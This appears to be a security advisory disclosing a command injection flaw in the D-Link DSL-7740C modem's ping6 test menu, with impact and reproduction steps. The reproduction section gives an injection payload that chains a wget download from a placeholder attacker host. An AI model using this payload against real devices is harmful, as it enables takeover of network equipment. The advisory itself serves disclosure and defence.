D-Link DSL-7740C Command Injection Vulnerability in Ping6 Function

A command injection vulnerability has been identified in the D-Link DSL-7740C modem, specifically in the firmware version DSL7740C.V6.TR069.20211230. The vulnerability arises in the device's SSH and Telnet interfaces, allowing remote execution of arbitrary commands with elevated privileges. This issue is triggered through the '19. Ping and Traceroute6 Test' menu option by entering a crafted payload as the destination during a ping6 test, which can lead to unauthorized code execution on the device.

Impact

Exploitation of this vulnerability allows for complete compromise of the affected device, with potential further impacts depending on the device's role within the network. An attacker could disrupt services, alter configurations, intercept or manipulate traffic, and possibly breach the network perimeter to access sensitive areas. The vulnerability's impact is severe, given the high level of control gained over the compromised device.

Reproduction

To reproduce this vulnerability, access the D-Link DSL-7740C modem via SSH or Telnet using administrative credentials. Navigate to the '19. Ping and Traceroute6 Test' menu option and select '02 Run Ping6 Test.' Enter a specially crafted payload as the destination, such as '1 || wget http://ATTACKER_HOST/test_ping6 -O /tmp/p6 #'. This will trigger the command injection, executing the payload on the device.